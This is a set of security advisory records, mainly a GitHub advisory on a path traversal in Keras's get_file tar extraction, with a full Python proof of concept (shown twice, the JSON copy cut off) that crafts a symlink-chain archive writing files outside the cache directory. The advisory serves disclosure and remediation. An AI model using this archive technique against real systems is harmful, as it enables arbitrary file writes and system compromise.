"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette DoS via Range header merging"
}
]
}
GHSA-28JP-44VH-Q42H
Vulnerability from github – Published: 2025-10-30 18:31 – Updated: 2025-12-02 00:53Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-hjqc-jx6g-rwp9. This link is maintained to preserve external references.
Original Description
The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-31T17:39:46Z",
"nvd_published_at": "2025-10-30T17:15:37Z",
"severity": "HIGH"
},
"details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hjqc-jx6g-rwp9. This link is maintained to preserve external references.\n\n### Original Description\nThe keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).",
"id": "GHSA-28jp-44vh-q42h",
"modified": "2025-12-02T00:53:21Z",
"published": "2025-10-30T18:31:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: Keras keras.utils.get_file API is vulnerable to a path traversal attack",
"withdrawn": "2025-12-02T00:53:21Z"
}
GHSA-HJQC-JX6G-RWP9
Vulnerability from github – Published: 2025-12-02 00:58 – Updated: 2025-12-02 00:58Summary
Keras's keras.utils.get_file() function is vulnerable to directory traversal attacks despite implementing filter_safe_paths(). The vulnerability exists because extract_archive() uses Python's tarfile.extractall() method without the security-critical filter="data" parameter. A PATH_MAX symlink resolution bug occurs before path filtering, allowing malicious tar archives to bypass security checks and write files outside the intended extraction directory.
Details
Root Cause Analysis
Current Keras Implementation
# From keras/src/utils/file_utils.py#L121
if zipfile.is_zipfile(file_path):
# Zip archive.
archive.extractall(path)
else:
# Tar archive, perhaps unsafe. Filter paths.
archive.extractall(path, members=filter_safe_paths(archive))
The Critical Flaw
While Keras attempts to filter unsafe paths using filter_safe_paths(), this filtering happens after the tar archive members are parsed and before actual extraction. However, the PATH_MAX symlink resolution bug occurs during extraction, not during member enumeration.
Exploitation Flow:
1. Archive parsing: filter_safe_paths() sees symlink paths that appear safe
2. Extraction begins: extractall() processes the filtered members
3. PATH_MAX bug triggers: Symlink resolution fails due to path length limits
4. Security bypass: Failed resolution causes literal path interpretation
5. Directory traversal: Files written outside intended directory
Technical Details
The vulnerability exploits a known issue in Python's tarfile module where excessively long symlink paths can cause resolution failures, leading to the symlink being treated as a literal path. This bypasses Keras's path filtering because:
filter_safe_paths()operates on the parsed tar member information- The PATH_MAX bug occurs during actual file system operations in
extractall() - Failed symlink resolution falls back to literal path interpretation
- This allows traversal paths like
../../../../etc/passwdto be written
Affected Code Location
File: keras/src/utils/file_utils.py
Function: extract_archive() around line 121
Issue: Missing filter="data" parameter in tarfile.extractall()
Proof of Concept
#!/usr/bin/env python3
import os, io, sys, tarfile, pathlib, platform, threading, time
import http.server, socketserver
# Import Keras directly (not through TensorFlow)
try:
import keras
print("Using standalone Keras:", keras.__version__)
get_file = keras.utils.get_file
except ImportError:
try:
import tensorflow as tf
print("Using Keras via TensorFlow:", tf.keras.__version__)
get_file = tf.keras.utils.get_file
except ImportError:
print("Neither Keras nor TensorFlow found!")
sys.exit(1)
print("=" * 60)
print("Keras get_file() PATH_MAX Symlink Vulnerability PoC")
print("=" * 60)
print("Python:", sys.version.split()[0])
print("Platform:", platform.platform())
root = pathlib.Path.cwd()
print(f"Working directory: {root}")
# Create target directory for exploit demonstration
exploit_dir = root / "exploit"
exploit_dir.mkdir(exist_ok=True)
# Clean up any previous exploit files
try:
(exploit_dir / "keras_pwned.txt").unlink()
except FileNotFoundError:
pass
print(f"\n=== INITIAL STATE ===")
print(f"Exploit directory: {exploit_dir}")
print(f"Files in exploit/: {[f.name for f in exploit_dir.iterdir()]}")
# Create malicious tar with PATH_MAX symlink resolution bug
print(f"\n=== Building PATH_MAX Symlink Exploit ===")
# Parameters for PATH_MAX exploitation
comp = 'd' * (55 if sys.platform == 'darwin' else 247)
steps = "abcdefghijklmnop" # 16-step symlink chain
path = ""
with tarfile.open("keras_dataset.tgz", mode="w:gz") as tar:
print("Creating deep symlink chain...")
# Build the symlink chain that will exceed PATH_MAX during resolution
for i, step in enumerate(steps):
# Directory with long name
dir_info = tarfile.TarInfo(os.path.join(path, comp))
dir_info.type = tarfile.DIRTYPE
tar.addfile(dir_info)
# Symlink pointing to that directory
link_info = tarfile.TarInfo(os.path.join(path, step))
link_info.type = tarfile.SYMTYPE
link_info.linkname = comp
tar.addfile(link_info)
path = os.path.join(path, comp)
if i < 3 or i % 4 == 0: # Print progress for first few and every 4th
print(f" Step {i+1}: {step} -> {comp[:20]}...")
# Create the final symlink that exceeds PATH_MAX
# This is where the symlink resolution breaks down
long_name = "x" * 254
linkpath = os.path.join("/".join(steps), long_name)
max_link = tarfile.TarInfo(linkpath)
max_link.type = tarfile.SYMTYPE
max_link.linkname = ("../" * len(steps))
tar.addfile(max_link)
print(f"✓ Created PATH_MAX symlink: {len(linkpath)} characters")
print(f" Points to: {'../' * len(steps)}")
# Exploit file through the broken symlink resolution
exploit_path = linkpath + "/../../../exploit/keras_pwned.txt"
exploit_content = b"KERAS VULNERABILITY CONFIRMED!\nThis file was created outside the cache directory!\nKeras get_file() is vulnerable to PATH_MAX symlink attacks!\n"
exploit_file = tarfile.TarInfo(exploit_path)
exploit_file.type = tarfile.REGTYPE
exploit_file.size = len(exploit_content)
tar.addfile(exploit_file, fileobj=io.BytesIO(exploit_content))
print(f"✓ Added exploit file via broken symlink path")
# Add legitimate dataset content
dataset_content = b"# Keras Dataset Sample\nThis appears to be a legitimate ML dataset\nimage1.jpg,cat\nimage2.jpg,dog\nimage3.jpg,bird\n"
dataset_file = tarfile.TarInfo("dataset/labels.csv")
dataset_file.type = tarfile.REGTYPE
dataset_file.size = len(dataset_content)
tar.addfile(dataset_file, fileobj=io.BytesIO(dataset_content))
# Dataset directory
dataset_dir = tarfile.TarInfo("dataset/")
dataset_dir.type = tarfile.DIRTYPE
tar.addfile(dataset_dir)
print("✓ Malicious Keras dataset created")
# Comparison Test: Python tarfile with filter (SAFE)
print(f"\n=== COMPARISON: Python tarfile with data filter ===")
try:
with tarfile.open("keras_dataset.tgz", "r:gz") as tar:
tar.extractall("python_safe", filter="data")
files_after = [f.name for f in exploit_dir.iterdir()]
print(f"✓ Python safe extraction completed")
print(f"Files in exploit/: {files_after}")
# Cleanup
import shutil
if pathlib.Path("python_safe").exists():
shutil.rmtree("python_safe", ignore_errors=True)
except Exception as e:
print(f"❌ Python safe extraction blocked: {str(e)[:80]}...")
files_after = [f.name for f in exploit_dir.iterdir()]
print(f"Files in exploit/: {files_after}")
# Start HTTP server to serve malicious archive
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, *args): pass
def run_server():
with socketserver.TCPServer(("127.0.0.1", 8005), SilentServer) as httpd:
httpd.allow_reuse_address = True
httpd.serve_forever()
server = threading.Thread(target=run_server, daemon=True)
server.start()
time.sleep(0.3)
# Keras vulnerability test
cache_dir = root / "keras_cache"
cache_dir.mkdir(exist_ok=True)
url = "http://127.0.0.1:8005/keras_dataset.tgz"
print(f"\n=== KERAS VULNERABILITY TEST ===")
print(f"Testing: keras.utils.get_file() with extract=True")
print(f"URL: {url}")
print(f"Cache: {cache_dir}")
print(f"Expected extraction: keras_cache/datasets/keras_dataset/")
print(f"Exploit target: exploit/keras_pwned.txt")
try:
# The vulnerable Keras call
extracted_path = get_file(
"keras_dataset",
url,
cache_dir=str(cache_dir),
extract=True
)
print(f"✓ Keras extraction completed")
print(f"✓ Returned path: {extracted_path}")
except Exception as e:
print(f"❌ Keras extraction failed: {e}")
import traceback
traceback.print_exc()
# Vulnerability assessment
print(f"\n=== VULNERABILITY RESULTS ===")
final_exploit_files = [f.name for f in exploit_dir.iterdir()]
print(f"Files in exploit directory: {final_exploit_files}")
if "keras_pwned.txt" in final_exploit_files:
print(f"\n🚨 KERAS VULNERABILITY CONFIRMED! 🚨")
exploit_file = exploit_dir / "keras_pwned.txt"
content = exploit_file.read_text()
print(f"Exploit file created: {exploit_file}")
print(f"Content:\n{content}")
print(f"🔍 TECHNICAL DETAILS:")
print(f" • Keras uses tarfile.extractall() without filter parameter")
print(f" • PATH_MAX symlink resolution bug bypassed security checks")
print(f" • File created outside intended cache directory")
print(f" • Same vulnerability pattern as TensorFlow get_file()")
print(f"\n📊 COMPARISON RESULTS:")
print(f" ✅ Python with filter='data': BLOCKED exploit")
print(f" ⚠️ Keras get_file(): ALLOWED exploit")
else:
print(f"✅ No exploit files detected")
print(f"Possible reasons:")
print(f" • Keras version includes security patches")
print(f" • Platform-specific path handling prevented exploit")
print(f" • Archive extraction path differed from expected")
# Show what Keras actually extracted (safely)
print(f"\n=== KERAS EXTRACTION ANALYSIS ===")
try:
if 'extracted_path' in locals() and pathlib.Path(extracted_path).exists():
keras_path = pathlib.Path(extracted_path)
print(f"Keras extracted to: {keras_path}")
# Safely list contents
try:
contents = [item.name for item in keras_path.iterdir()]
print(f"Top-level contents: {contents}")
# Count symlinks (indicates our exploit structure was created)
symlink_count = 0
for item in keras_path.iterdir():
try:
if item.is_symlink():
symlink_count += 1
except PermissionError:
continue
print(f"Symlinks created: {symlink_count}")
if symlink_count > 0:
print(f"✓ PATH_MAX symlink chain was extracted")
except PermissionError:
print(f"Permission errors in extraction directory (expected with symlink corruption)")
except Exception as e:
print(f"Could not analyze Keras extraction: {e}")
print(f"\n=== REMEDIATION ===")
print(f"To fix this vulnerability, Keras should use:")
print(f"```python")
print(f"tarfile.extractall(path, filter='data') # Safe")
print(f"```")
print(f"Instead of:")
print(f"```python")
print(f"tarfile.extractall(path) # Vulnerable")
print(f"```")
# Cleanup
print(f"\n=== CLEANUP ===")
try:
os.unlink("keras_dataset.tgz")
print(f"✓ Removed malicious tar file")
except:
pass
print("PoC completed!")
Environment Setup
- Python: 3.8+ (tested on multiple versions)
- Keras: Standalone Keras or TensorFlow.Keras
- Platform: Linux, macOS, Windows (path handling varies)
Exploitation Steps
- Create malicious tar archive with PATH_MAX symlink chain
- Host archive on accessible HTTP server
- Call
keras.utils.get_file()withextract=True - Observe directory traversal - files written outside cache directory
Key Exploit Components
- Deep symlink chain: 16+ nested symlinks with long directory names
- PATH_MAX overflow: Final symlink path exceeding system limits
- Traversal payload: Relative path traversal (
../../../target/file) - Legitimate disguise: Archive contains valid-looking dataset files
Demonstration Results
Vulnerable behavior:
- Files extracted outside intended cache_dir/datasets/ location
- Security filtering bypassed completely
- No error or warning messages generated
Expected secure behavior: - Extraction blocked or confined to cache directory - Security warnings for suspicious archive contents
Impact
Vulnerability Classification
- Type: Directory Traversal / Path Traversal (CWE-22)
- Severity: High
- CVSS Components: Network accessible, no authentication required, impacts confidentiality and integrity
Who Is Impacted
Direct Impact:
- Applications using keras.utils.get_file() with extract=True
- Machine learning pipelines downloading and extracting datasets
- Automated ML training systems processing external archives
Attack Scenarios: 1. Malicious datasets: Attacker hosts compromised ML dataset 2. Supply chain: Legitimate dataset repositories compromised 3. Model poisoning: Extraction writes malicious files alongside training data 4. System compromise: Configuration files, executables written to system directories
Affected Environments: - Research environments downloading public datasets - Production ML systems with automated dataset fetching - Educational platforms using Keras for tutorials - CI/CD pipelines training models with external data
Risk Assessment
High Risk Factors: - Common usage pattern in ML workflows - No user awareness of extraction security - Silent failure mode (no warnings) - Cross-platform vulnerability
Potential Consequences: - Arbitrary file write on target system - Configuration file tampering - Code injection via overwritten scripts - Data exfiltration through planted files - System compromise in containerized environments
Recommended Fix
Immediate Mitigation
Replace the vulnerable extraction code with:
# Secure implementation
if zipfile.is_zipfile(file_path):
# Zip archive - implement similar filtering
archive.extractall(path, members=filter_safe_paths(archive))
else:
# Tar archive with proper security filter
archive.extractall(path, members=filter_safe_paths(archive), filter="data")
Long-term Solution
- Add
filter="data"parameter to alltarfile.extractall()calls - Implement comprehensive path validation before extraction
- Add extraction logging for security monitoring
- Consider sandboxed extraction for untrusted archives
- Update documentation to warn about archive security risks
Backward Compatibility
The fix maintains full backward compatibility as filter="data" is the recommended secure default for Python 3.12+.
References
- [Python tarfile security documentation](https://docs.python.org/3/library/tarfile.html#extraction-filters)
- [CVE-2007-4559](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559) - Related tarfile vulnerability
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
Note: Reported in Huntr as well, but didn't get response https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.3"
},
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-12060"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-02T00:58:33Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nKeras\u0027s `keras.utils.get_file()` function is vulnerable to directory traversal attacks despite implementing `filter_safe_paths()`. The vulnerability exists because `extract_archive()` uses Python\u0027s `tarfile.extractall()` method without the security-critical `filter=\"data\"` parameter. A PATH_MAX symlink resolution bug occurs before path filtering, allowing malicious tar archives to bypass security checks and write files outside the intended extraction directory.\n\n## Details\n\n### Root Cause Analysis\n\n**Current Keras Implementation**\n```python\n# From keras/src/utils/file_utils.py#L121\nif zipfile.is_zipfile(file_path):\n # Zip archive.\n archive.extractall(path)\nelse:\n # Tar archive, perhaps unsafe. Filter paths.\n archive.extractall(path, members=filter_safe_paths(archive))\n```\n\n### The Critical Flaw\n\nWhile Keras attempts to filter unsafe paths using `filter_safe_paths()`, this filtering happens after the tar archive members are parsed and before actual extraction. However, the PATH_MAX symlink resolution bug occurs during extraction, not during member enumeration.\n\n**Exploitation Flow:**\n1. **Archive parsing**: `filter_safe_paths()` sees symlink paths that appear safe\n2. **Extraction begins**: `extractall()` processes the filtered members\n3. **PATH_MAX bug triggers**: Symlink resolution fails due to path length limits\n4. **Security bypass**: Failed resolution causes literal path interpretation\n5. **Directory traversal**: Files written outside intended directory\n\n### Technical Details\n\nThe vulnerability exploits a known issue in Python\u0027s `tarfile` module where excessively long symlink paths can cause resolution failures, leading to the symlink being treated as a literal path. This bypasses Keras\u0027s path filtering because:\n\n- `filter_safe_paths()` operates on the parsed tar member information\n- The PATH_MAX bug occurs during actual file system operations in `extractall()`\n- Failed symlink resolution falls back to literal path interpretation\n- This allows traversal paths like `../../../../etc/passwd` to be written\n\n### Affected Code Location\n\n**File**: `keras/src/utils/file_utils.py` \n**Function**: `extract_archive()` around line 121 \n**Issue**: Missing `filter=\"data\"` parameter in `tarfile.extractall()`\n\n## Proof of Concept\n```\n#!/usr/bin/env python3\nimport os, io, sys, tarfile, pathlib, platform, threading, time\nimport http.server, socketserver\n\n# Import Keras directly (not through TensorFlow)\ntry:\n import keras\n print(\"Using standalone Keras:\", keras.__version__)\n get_file = keras.utils.get_file\nexcept ImportError:\n try:\n import tensorflow as tf\n print(\"Using Keras via TensorFlow:\", tf.keras.__version__)\n get_file = tf.keras.utils.get_file\n except ImportError:\n print(\"Neither Keras nor TensorFlow found!\")\n sys.exit(1)\n\nprint(\"=\" * 60)\nprint(\"Keras get_file() PATH_MAX Symlink Vulnerability PoC\")\nprint(\"=\" * 60)\nprint(\"Python:\", sys.version.split()[0])\nprint(\"Platform:\", platform.platform())\n\nroot = pathlib.Path.cwd()\nprint(f\"Working directory: {root}\")\n\n# Create target directory for exploit demonstration\nexploit_dir = root / \"exploit\"\nexploit_dir.mkdir(exist_ok=True)\n\n# Clean up any previous exploit files\ntry:\n (exploit_dir / \"keras_pwned.txt\").unlink()\nexcept FileNotFoundError:\n pass\n\nprint(f\"\\n=== INITIAL STATE ===\")\nprint(f\"Exploit directory: {exploit_dir}\")\nprint(f\"Files in exploit/: {[f.name for f in exploit_dir.iterdir()]}\")\n\n# Create malicious tar with PATH_MAX symlink resolution bug\nprint(f\"\\n=== Building PATH_MAX Symlink Exploit ===\")\n\n# Parameters for PATH_MAX exploitation\ncomp = \u0027d\u0027 * (55 if sys.platform == \u0027darwin\u0027 else 247)\nsteps = \"abcdefghijklmnop\" # 16-step symlink chain\npath = \"\"\n\nwith tarfile.open(\"keras_dataset.tgz\", mode=\"w:gz\") as tar:\n print(\"Creating deep symlink chain...\")\n \n # Build the symlink chain that will exceed PATH_MAX during resolution\n for i, step in enumerate(steps):\n # Directory with long name\n dir_info = tarfile.TarInfo(os.path.join(path, comp))\n dir_info.type = tarfile.DIRTYPE\n tar.addfile(dir_info)\n \n # Symlink pointing to that directory\n link_info = tarfile.TarInfo(os.path.join(path, step))\n link_info.type = tarfile.SYMTYPE\n link_info.linkname = comp\n tar.addfile(link_info)\n \n path = os.path.join(path, comp)\n \n if i \u003c 3 or i % 4 == 0: # Print progress for first few and every 4th\n print(f\" Step {i+1}: {step} -\u003e {comp[:20]}...\")\n \n # Create the final symlink that exceeds PATH_MAX\n # This is where the symlink resolution breaks down\n long_name = \"x\" * 254\n linkpath = os.path.join(\"/\".join(steps), long_name)\n \n max_link = tarfile.TarInfo(linkpath)\n max_link.type = tarfile.SYMTYPE\n max_link.linkname = (\"../\" * len(steps))\n tar.addfile(max_link)\n \n print(f\"\u2713 Created PATH_MAX symlink: {len(linkpath)} characters\")\n print(f\" Points to: {\u0027../\u0027 * len(steps)}\")\n \n # Exploit file through the broken symlink resolution\n exploit_path = linkpath + \"/../../../exploit/keras_pwned.txt\"\n exploit_content = b\"KERAS VULNERABILITY CONFIRMED!\\nThis file was created outside the cache directory!\\nKeras get_file() is vulnerable to PATH_MAX symlink attacks!\\n\"\n \n exploit_file = tarfile.TarInfo(exploit_path)\n exploit_file.type = tarfile.REGTYPE\n exploit_file.size = len(exploit_content)\n tar.addfile(exploit_file, fileobj=io.BytesIO(exploit_content))\n \n print(f\"\u2713 Added exploit file via broken symlink path\")\n \n # Add legitimate dataset content\n dataset_content = b\"# Keras Dataset Sample\\nThis appears to be a legitimate ML dataset\\nimage1.jpg,cat\\nimage2.jpg,dog\\nimage3.jpg,bird\\n\"\n dataset_file = tarfile.TarInfo(\"dataset/labels.csv\")\n dataset_file.type = tarfile.REGTYPE\n dataset_file.size = len(dataset_content)\n tar.addfile(dataset_file, fileobj=io.BytesIO(dataset_content))\n \n # Dataset directory\n dataset_dir = tarfile.TarInfo(\"dataset/\")\n dataset_dir.type = tarfile.DIRTYPE\n tar.addfile(dataset_dir)\n\nprint(\"\u2713 Malicious Keras dataset created\")\n\n# Comparison Test: Python tarfile with filter (SAFE)\nprint(f\"\\n=== COMPARISON: Python tarfile with data filter ===\")\ntry:\n with tarfile.open(\"keras_dataset.tgz\", \"r:gz\") as tar:\n tar.extractall(\"python_safe\", filter=\"data\")\n \n files_after = [f.name for f in exploit_dir.iterdir()]\n print(f\"\u2713 Python safe extraction completed\")\n print(f\"Files in exploit/: {files_after}\")\n \n # Cleanup\n import shutil\n if pathlib.Path(\"python_safe\").exists():\n shutil.rmtree(\"python_safe\", ignore_errors=True)\n \nexcept Exception as e:\n print(f\"\u274c Python safe extraction blocked: {str(e)[:80]}...\")\n files_after = [f.name for f in exploit_dir.iterdir()]\n print(f\"Files in exploit/: {files_after}\")\n\n# Start HTTP server to serve malicious archive\nclass SilentServer(http.server.SimpleHTTPRequestHandler):\n def log_message(self, *args): pass\n\ndef run_server():\n with socketserver.TCPServer((\"127.0.0.1\", 8005), SilentServer) as httpd:\n httpd.allow_reuse_address = True\n httpd.serve_forever()\n\nserver = threading.Thread(target=run_server, daemon=True)\nserver.start()\ntime.sleep(0.3)\n\n# Keras vulnerability test\ncache_dir = root / \"keras_cache\"\ncache_dir.mkdir(exist_ok=True)\nurl = \"http://127.0.0.1:8005/keras_dataset.tgz\"\n\nprint(f\"\\n=== KERAS VULNERABILITY TEST ===\")\nprint(f\"Testing: keras.utils.get_file() with extract=True\")\nprint(f\"URL: {url}\")\nprint(f\"Cache: {cache_dir}\")\nprint(f\"Expected extraction: keras_cache/datasets/keras_dataset/\")\nprint(f\"Exploit target: exploit/keras_pwned.txt\")\n\ntry:\n # The vulnerable Keras call\n extracted_path = get_file(\n \"keras_dataset\",\n url,\n cache_dir=str(cache_dir),\n extract=True\n )\n print(f\"\u2713 Keras extraction completed\")\n print(f\"\u2713 Returned path: {extracted_path}\")\n \nexcept Exception as e:\n print(f\"\u274c Keras extraction failed: {e}\")\n import traceback\n traceback.print_exc()\n\n# Vulnerability assessment\nprint(f\"\\n=== VULNERABILITY RESULTS ===\")\nfinal_exploit_files = [f.name for f in exploit_dir.iterdir()]\nprint(f\"Files in exploit directory: {final_exploit_files}\")\n\nif \"keras_pwned.txt\" in final_exploit_files:\n print(f\"\\n\ud83d\udea8 KERAS VULNERABILITY CONFIRMED! \ud83d\udea8\")\n \n exploit_file = exploit_dir / \"keras_pwned.txt\"\n content = exploit_file.read_text()\n print(f\"Exploit file created: {exploit_file}\")\n print(f\"Content:\\n{content}\")\n \n print(f\"\ud83d\udd0d TECHNICAL DETAILS:\")\n print(f\" \u2022 Keras uses tarfile.extractall() without filter parameter\")\n print(f\" \u2022 PATH_MAX symlink resolution bug bypassed security checks\")\n print(f\" \u2022 File created outside intended cache directory\")\n print(f\" \u2022 Same vulnerability pattern as TensorFlow get_file()\")\n \n print(f\"\\n\ud83d\udcca COMPARISON RESULTS:\")\n print(f\" \u2705 Python with filter=\u0027data\u0027: BLOCKED exploit\")\n print(f\" \u26a0\ufe0f Keras get_file(): ALLOWED exploit\")\n \nelse:\n print(f\"\u2705 No exploit files detected\")\n print(f\"Possible reasons:\")\n print(f\" \u2022 Keras version includes security patches\")\n print(f\" \u2022 Platform-specific path handling prevented exploit\")\n print(f\" \u2022 Archive extraction path differed from expected\")\n\n# Show what Keras actually extracted (safely)\nprint(f\"\\n=== KERAS EXTRACTION ANALYSIS ===\")\ntry:\n if \u0027extracted_path\u0027 in locals() and pathlib.Path(extracted_path).exists():\n keras_path = pathlib.Path(extracted_path)\n print(f\"Keras extracted to: {keras_path}\")\n \n # Safely list contents\n try:\n contents = [item.name for item in keras_path.iterdir()]\n print(f\"Top-level contents: {contents}\")\n \n # Count symlinks (indicates our exploit structure was created)\n symlink_count = 0\n for item in keras_path.iterdir():\n try:\n if item.is_symlink():\n symlink_count += 1\n except PermissionError:\n continue\n \n print(f\"Symlinks created: {symlink_count}\")\n if symlink_count \u003e 0:\n print(f\"\u2713 PATH_MAX symlink chain was extracted\")\n \n except PermissionError:\n print(f\"Permission errors in extraction directory (expected with symlink corruption)\")\n \nexcept Exception as e:\n print(f\"Could not analyze Keras extraction: {e}\")\n\nprint(f\"\\n=== REMEDIATION ===\")\nprint(f\"To fix this vulnerability, Keras should use:\")\nprint(f\"```python\")\nprint(f\"tarfile.extractall(path, filter=\u0027data\u0027) # Safe\")\nprint(f\"```\")\nprint(f\"Instead of:\")\nprint(f\"```python\") \nprint(f\"tarfile.extractall(path) # Vulnerable\")\nprint(f\"```\")\n\n# Cleanup\nprint(f\"\\n=== CLEANUP ===\")\ntry:\n os.unlink(\"keras_dataset.tgz\")\n print(f\"\u2713 Removed malicious tar file\")\nexcept:\n pass\n\nprint(\"PoC completed!\")\n\n```\n### Environment Setup\n- **Python**: 3.8+ (tested on multiple versions)\n- **Keras**: Standalone Keras or TensorFlow.Keras\n- **Platform**: Linux, macOS, Windows (path handling varies)\n\n### Exploitation Steps\n\n1. **Create malicious tar archive** with PATH_MAX symlink chain\n2. **Host archive** on accessible HTTP server\n3. **Call `keras.utils.get_file()`** with `extract=True`\n4. **Observe directory traversal** - files written outside cache directory\n\n### Key Exploit Components\n\n- **Deep symlink chain**: 16+ nested symlinks with long directory names\n- **PATH_MAX overflow**: Final symlink path exceeding system limits\n- **Traversal payload**: Relative path traversal (`../../../target/file`)\n- **Legitimate disguise**: Archive contains valid-looking dataset files\n\n### Demonstration Results\n\n**Vulnerable behavior:**\n- Files extracted outside intended `cache_dir/datasets/` location\n- Security filtering bypassed completely\n- No error or warning messages generated\n\n**Expected secure behavior:**\n- Extraction blocked or confined to cache directory\n- Security warnings for suspicious archive contents\n\n## Impact\n\n### Vulnerability Classification\n- **Type**: Directory Traversal / Path Traversal (CWE-22)\n- **Severity**: High\n- **CVSS Components**: Network accessible, no authentication required, impacts confidentiality and integrity\n\n### Who Is Impacted\n\n**Direct Impact:**\n- Applications using `keras.utils.get_file()` with `extract=True`\n- Machine learning pipelines downloading and extracting datasets\n- Automated ML training systems processing external archives\n\n**Attack Scenarios:**\n1. **Malicious datasets**: Attacker hosts compromised ML dataset\n2. **Supply chain**: Legitimate dataset repositories compromised\n3. **Model poisoning**: Extraction writes malicious files alongside training data\n4. **System compromise**: Configuration files, executables 